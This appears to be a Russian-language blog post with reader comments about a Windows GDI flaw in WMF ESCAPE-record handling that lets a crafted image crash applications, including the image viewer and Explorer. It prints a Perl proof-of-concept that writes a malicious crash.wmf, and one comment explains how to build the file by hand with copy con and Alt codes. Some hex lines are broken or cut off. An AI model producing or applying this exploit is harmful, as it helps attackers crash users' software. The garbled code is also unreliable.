Личные блоги Удаленный пользователь может с помощью специально сформированного изображения вызвать отказ в обслуживании приложения, использующего уязвимую библиотеку.
Это происходит при отображении ESCAPE-метазаписи (фунция STARTDOC)так как, не инициализированый адреса импорта функции SeekPrinter из winspool.drv.
Уязвимыми оказываются не только приложения успользующие напрямую GDI, но и приложения использующие функции shimgvw.dll как "высокоуровневой обёртки" GDI, такие как "Программа просмотра изображений и факсов" и Windows Explorer.
Способов устранения уязвимости не существует в настоящее время.
Эксплоит:
#!/usr/bin/perl
print "
WMF PoC denial of service exploit by AzM";
print "
generating crash.wmf...";
open(WMF, ">./crash.wmf") or die "cannot create wmf file
";
print WMF "x01x00x09x00x00x03x22x00x00x00x01x00x84x43x0
print WMF "x00x00x10x00x00x00x26x06x0Ax00x16x00x90x90x9
print WMF "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x9
print WMF "x90x90x90x90x90x90x90x90x90x90x90x90x90x00x0
print WMF "x00x00x00x00";
close(WMF);
print "Ok
";
TOP Новости 
Подписка
Вирусы 
У меня DOS'а не происходит
Значит ты делаешь что то не так... Этот код сам не является эксплоитом. Эксплоитом является файл WMF полученный на выходе. Если нет перла, можно воспользоватся любым HEX редактором для создания файла. Если нет и HEX редактора под рукой, всегда есть лист бумаги, карандаш и copy con exploit.wmf
а по подробней можна, плиз
Конечно можно. Если под рукой есть калькулятор который переводит из HEX в DEC то, берем каждый байт эксплоита, и переводим сначала в DEC. то есть, например: \x01\x00\x09\x00\x00\x03\x22\, это будет 001, 000,009, 000,000, 003, 034 И т.д. Потом открываем cmd и набираем: copy con имя_файла.wmf. Потом при помощи вспомогательной цифровой клавиатуры (там где нам лок), зажав кнопку alt набираем: alt-001, отпустили альт, alt-034 и т.д. После того как набрали весь файл, жмем CTLR-Z. Проблема лишь в том, что есть некоторые alt последовательности, которые нельзя набрать на этой клавиатуре. Поэтому сначала надо перенести весь код на ассемблер, исправить комбинации которые нельзя перенести, ассемблировать, открывать HEX редактором и переводить в DEC. Вообщем это тема отдельного разговора. Кому интересно стучитесь в аську 2000-9-4444
Если можно вышли плиз на мыло готовый WMF
hacker-maker@yandex.ru
А не расскажете куда можно вставить свой shell-код ?
Никуда. Это DOS атака, отказ в обслуживании, а не переполнение буфера.
Да ! Очень интересная уязвимость...А главное как просто эксплоит залепить ! AzM МОЛОДЕЦ !!! Найти такую уязвимость ! Супер !
и как этот WMF использовать....